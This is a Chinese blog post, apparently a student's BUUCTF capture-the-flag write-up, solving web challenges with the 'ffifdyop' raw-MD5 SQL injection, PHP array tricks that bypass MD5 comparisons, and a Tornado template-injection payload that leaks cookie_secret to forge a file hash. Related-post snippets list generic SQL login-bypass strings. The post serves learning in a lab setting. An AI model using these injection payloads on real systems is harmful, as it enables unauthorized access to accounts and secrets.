BUUCTF-MD5强弱比较-MD5()的万能密码-tornado框架注入-中文电码

已于 2023-04-09 20:51:13 修改
阅读量849 收藏 1
点赞数
分类专栏: BUUctf SQL注入 文章标签: java 开发语言
于 2023-04-09 20:48:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130045898
版权

第六周 第三次

目录

学习到的知识

1.MD5强弱比较可以都可以使用数组绕过

2.基于MD5()的万能密码    ffifdyop

WEB

[BJDCTF2020]Easy MD5

​编辑[护网杯 2018]easy_tornado

Crypto

信息化时代的步伐

凯撒?替换?呵呵!

Misc

神秘龙卷风

学习到的知识

1.MD5强弱比较可以都可以使用数组绕过

2.基于MD5()的万能密码    ffifdyop

WEB

[BJDCTF2020]Easy MD5

 打开环境 什么都没有 输入任何也都没有反应 我们进行抓包

 发现查询语句

我们想到sql注入

发现md5函数 我们进行搜索

md5(1,2)

1:是要进行计算的字符串
2:可选  是TRUE 就是将计算完的数字进行16位字符二进制输出
        是FALSE 就是将计算完的数字进行32位字符十六进制输出

所以我们明白 我们需要输入一个能够将 16位二进制变为sql注入语句的

我们想到万能密码

在mysql中  对于字符串

''or'1xxxxxx' ---->True
''or'0xxxxxx' ---->False

所以我们要找到一个字符串 转换为hex 后再变为字符能为'or'非0

ffifdyop

变为hex后为

276F722736C95D99E921722CF9ED621C

转为字符串后

'or'6É]é!r,ùíb

 所以我们输入这个字符串

 查看源代码

发现弱比较

使用数组绕过

MD5绕过(强弱类型比较)_md5弱类型比较_陈wonton的博客-CSDN博客

?a[]=1&b[]=2

 发现MD5强比较

继续使用数组绕过

param1[]=1&param2[]=3

得到flag

[护网杯 2018]easy_tornado

这道对我来说特别新 并且是边看边做

本质是 SSTI注入

并且 题目也提示我们了

tornado是 python编写的框架

类似于后端渲染

sql注入是用户输入的代码
SSTI注入是框架的注入

所以我们开始答题

打开环境 一个一个看过去

 在每一个url上面都有一个 hash 然后这个文件就给我们是怎么计算哈希的

我们现在需要找 cookie_secret这个的数值

然后 我们搜索 发现cookie_secret这个是在tornado框架有的文件

在handler.settings 文件下

所以我们寻找注入点

当我们把hash值改变后得到

 我们看看更改error

 url改什么 他都会返回什么 所以我们找到注入点了 我们在这上面进行框架注入

注意 这个框架注入需要用{{}}来注入

error?msg={{handler.settings}}

 得到了数值 然后我们进行计算

import hashlib
hash = hashlib.md5()

filename='/fllllllllllllag'
cookie_secret="b2ab97ba-5c7a-4fff-a8f5-c459b76e6b8a"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

然后构造

file?filename=/fllllllllllllag&filehash=c446c58655463f690c65a78092d75fc3

得到flag

[护网杯 2018]easy_tornado WriteUp(超级详细!)_lunan0320的博客-CSDN博客

Crypto

信息化时代的步伐

得到新的加密方法 中文电码

中文电码查询 - 中文电码转换 - 中文电码对照表

凯撒?替换?呵呵!

我们进行比对 MTHJ得到flag

quipqiup - cryptoquip and cryptogram solver

使用这个暴力破解

 发现第一条就是可以读的句子

Misc

神秘龙卷风

暴力破解

Brainfuck - interpreter online

放入网站

得到flag

双层小牛堡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF--MD5 writeup分享
m0_74374798的博客
07-03 754
Crypto--MD5 writeup
buuctf MD5
weixin_69535306的博客
06-30 193
信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。最终结果为:flag{admin1}首先看题可得此题为MD5算法。输入密文可得明文admin1。利用MD5算法解密网站。
BUUCTF 丢失的MD5 1
YueXuan_521的博客
06-08 742
BUUCTF 丢失的MD5 1
BUUCTF题解——MD5
qq_62745045的博客
05-17 227
BUUCTF题解
BUUCTF解题——MD5
2301_79966764的博客
10-08 120
使用MD5在线解密工具破解。提示说MD5,打开文件。
tornado-swagger
04-30
from tornado . web import RequestHandler , HTTPError from tornado_swagger import swagger swagger . docs () # You may decorate your operation with @swagger.operation and use docs to inform information...
Python-msgsender是一个基于tornado框架实现的异步消息发送接口
08-10
Python-msgsender是一个强大的工具,它基于著名的Tornado Web框架构建,设计用于实现异步消息发送功能。Tornado是一个开源的Python web框架和异步网络库,最初由FriendFeed开发,后来被Facebook收购并开源。其核心...
Python-Turbo一个基于Tornado的Web框架
08-10
Turbo 是一个 Python 的 Web 框架,用于快速构建 Web 网站和 RESTful API,基于 Tornado、MongoDB 和 Redis。主要特性: 易于安装和维护 快速开发 Web 网站和 RESTful api 使用 Django 或者 flask 应用结构 定制容易
swagger-py-codegen:Python Web框架生成器支持Flask,Tornado,Falcon和Sanic
02-05
Python RESTful Web框架生成器 总览 Swagger Py Codegen是Python Web框架生成器,可以帮助您基于给定的Swagger Specification文档自动生成Python Web框架。 当前,支持以下语言/框架: (Python) (Python) ...
Python-一个基于TornadoWeb框架的简单的RESTFulAPI库
08-11
**Python与Tornado Web框架** Python是一种广泛使用的高级编程语言,尤其在Web开发领域,它以其简洁、易读的语法和强大的库支持而备受青睐。Tornado Web框架是Python中的一个轻量级、高性能的异步网络库,适用于...
超级好用的MD5解密,解密度达95%
09-11
非常好用的MD5解密工具,自己用的东西,今天 拿来分享一下。
万能密码
freshfox的博客
05-30 2749
试一下'or''='吧,在提交用户名处输入 jmdcw'or''=',这样的SQL语句就是select username,userpass from user where username='jmdcw'or''='' and userpass='12345678' 在逻辑表达式中,AND的优先级要高于OR,所以语句会先对 “''='' and userpass='12345678'” ...
BUU MD5
zcx的博客
11-29 448
点开题目并下载文件,解压后发现是是一个txt文件,根据题目提示可知,这是一段MD5密码。 将密码在线解码即可得到flag。 MD5加密特点:md5加密后是16位或者32位的字符,由字母和数字组成,字母大小写统一。 ...
BUUCTF crypto——MD5
m0_74093152的博客
02-03 114
BUUCTFcrypto——MD5
Raw MD5 Hash引发的注入
qq_37466661的博客
08-29 277
md5 字符逃逸 注入
MD5密码忘记破解
qq_43257509的博客
04-26 1264
1,进入登陆界面 admin 2,输入密码账号就是进不了 注意左下角出现的 /chklogin.asp 非常关键 3,进入/admin下的chklogin.asp 查看源代码 注意到这个页面 <% dim username,password,sql,rs password1=trim(request(“password1”)) username=trim(request(“username”...
后台登陆万能密码总结
热门推荐
lizhengnanhua的专栏
09-07 2万+
1.Asp/Aspx万能密码: 'or'='or''or 1=1--''or 1=1--'or'a'='a"or "a"="a"or"="a'='a ')or('a'='aor 1=1--a'or' 1=1--"or"="a'='a'or''='1 or '1'='1'=11 or '1'='1' or 1=1'OR 1=1%00"or 1=1%00'xoradmin' or 'a'='
接口请求之加密参数(用户名和密码),使用md5方法加密
王子的博客
03-25 8854
一:接口请求涉及到一些类似用户名和密码等敏感信息的东西,请求肯定要进行加密;        当然首先你得问开发,他们对参数是否加密,用了什么方式进行加密;       我这里就用md5加密方式对请求的密码进行加密。 二:前端对字符串类型的密码进行加密,输出秘钥,传递时候是传递秘钥,后台根据相同的加密方式解析。 三:代码附上:    1.封装成为一个方法,用的时候,直接使用即可。
数据库,万能密码密码解析
Zyh's blog
01-13 3498
数据库
python3-tornado
最新发布
01-30
Python3-tornado是一个基于Python的Web框架,它使用非阻塞的I/O模型,可以处理高并发的网络请求。它的特点是轻量级、高效、易用,适用于开发高性能的Web应用和实时应用程序。 以下是一个简单的Python3-tornado示例代码: ```python import tornado.web import tornado.ioloop import tornado.httpserver class IndexHandler(tornado.web.RequestHandler): """主路由处理类""" def get(self): self.write("Hello World!") if __name__ == "__main__": app = tornado.web.Application([ (r"/", IndexHandler), ]) http_server = tornado.httpserver.HTTPServer(app) http_server.listen(8000) tornado.ioloop.IOLoop.current().start() ``` 这段代码创建了一个名为`IndexHandler`的处理类,当用户访问根路径时,会调用`get`方法并返回"Hello World!"。然后,通过`Application`类创建一个应用实例,并将路由映射到处理类。最后,创建一个HTTP服务器并监听8000端口,通过`IOLoop`类启动事件循环。 你可以将以上代码保存为一个Python文件,然后在命令行中运行该文件,即可启动一个简单的Python3-tornado服务器。当你访问http://localhost:8000时,会显示"Hello World!"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值